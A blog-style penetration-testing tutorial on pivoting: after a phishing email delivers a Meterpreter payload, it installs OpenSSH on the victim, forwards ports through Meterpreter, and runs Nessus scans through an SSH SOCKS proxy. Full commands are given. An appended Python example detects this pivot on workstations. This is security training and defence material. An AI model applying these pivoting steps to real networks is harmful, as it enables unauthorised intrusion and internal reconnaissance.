Thursday, January 5, 2012

Metasploit~ Nessus Scanning through a Metasploit Meterpreter Session


This tutorial assumes you have already installed SSH on the victim's system; if not, start at Step 1.

Scenario: You are doing a penetration test. The client's internet-facing perimeter is locked down pretty well. No services are exposed externally, and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted message with the Meterpreter payload attached. An accommodating user is more than happy to click your attachment, giving you Meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.

The Players
Attacker 192.168.1.3
Victim 192.168.1.9

Step 1 - After you have Meterpreter access, install OpenSSH on the victim's computer. See this for instructions.

Step 2 - After you've installed OpenSSH and set up your account, use Meterpreter's portfwd command to forward a port on the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 192.168.1.3 -l 8000 -r 192.168.1.9 -p 22

This command sets up a listener on port 8000 of the attacker's IP (192.168.1.3) and forwards its traffic, through the Meterpreter session, to port 22 on the victim's machine (192.168.1.9).


Step 3 - SSH into the portfwd port you just created and set up a dynamic port forward on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@192.168.1.3

This command sets up a SOCKS4 proxy on local port 9000; connections made to it are tunnelled through the SSH session and leave from the victim's machine.

Step 4 - Use proxychains to send your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the Nessus client and run your scan; every scan connection now originates from the victim's machine inside the network.
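From the defender's side, the pivot above leaves two footprints on the victim workstation at once: a new SSH listener on tcp/22 (Step 1) and a long-lived outbound HTTPS session carrying the Meterpreter channel. The Python below is an added example, not code from the original post; it runs over constructed endpoint connection records and flags workstations that show both. Host names, roles, the 443-only egress and the one-hour threshold are assumptions.

```python
"""Flag workstations that both listen on an unexpected port (SSH, tcp/22)
and hold a long-lived outbound HTTPS connection: the combination that the
Meterpreter -> OpenSSH -> proxychains pivot produces on the victim host."""
from collections import defaultdict

# Constructed sample records (not real telemetry):
# (host, role, state, local_addr, remote_addr, connection_age_seconds)
SAMPLE_RECORDS = [
    ("ws-finance-12", "workstation", "LISTEN",      "0.0.0.0:22",         "-",                0),
    ("ws-finance-12", "workstation", "ESTABLISHED", "192.168.1.9:49321",  "203.0.113.7:443",  7200),
    ("ws-hr-03",      "workstation", "ESTABLISHED", "192.168.1.20:50011", "203.0.113.9:443",  45),
    ("ws-hr-03",      "workstation", "LISTEN",      "0.0.0.0:3389",       "-",                0),
    ("srv-bastion-01", "server",     "LISTEN",      "0.0.0.0:22",         "-",                0),
    ("srv-bastion-01", "server",     "ESTABLISHED", "192.168.1.5:40000",  "203.0.113.7:443",  9000),
]

UNEXPECTED_LISTEN_PORTS = {22}   # assumption: SSH has no business on a workstation
LONG_LIVED_SECONDS = 3600        # assumption: a C2 tunnel stays up far longer than a web request
EGRESS_PORT = 443                # the only outbound port the scenario's firewall allows


def port_of(addr):
    """Return the numeric port of an 'ip:port' string (IPv4 form as in the samples)."""
    return int(addr.rsplit(":", 1)[1])


def find_pivot_hosts(records):
    """Return {host: {"listening": [ports], "outbound": [remotes]}} for every
    workstation that has BOTH an unexpected listener and a long-lived egress session."""
    listens, tunnels = defaultdict(set), defaultdict(list)
    for host, role, state, local, remote, age in records:
        if role != "workstation":
            continue                                  # servers may legitimately run sshd
        if state == "LISTEN" and port_of(local) in UNEXPECTED_LISTEN_PORTS:
            listens[host].add(port_of(local))
        elif (state == "ESTABLISHED" and port_of(remote) == EGRESS_PORT
              and age >= LONG_LIVED_SECONDS):
            tunnels[host].append(remote)
    # only hosts showing both halves of the pattern are reported
    return {h: {"listening": sorted(listens[h]), "outbound": tunnels[h]}
            for h in listens if h in tunnels}


if __name__ == "__main__":
    for host, detail in find_pivot_hosts(SAMPLE_RECORDS).items():
        print(f"{host}: unexpected listener {detail['listening']}, "
              f"long-lived egress to {detail['outbound']}")
```

Either footprint alone (an RDP listener, a long browser session) is noise on its own; requiring both keeps the check useful as an alert rather than a report.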

 

The Hacker News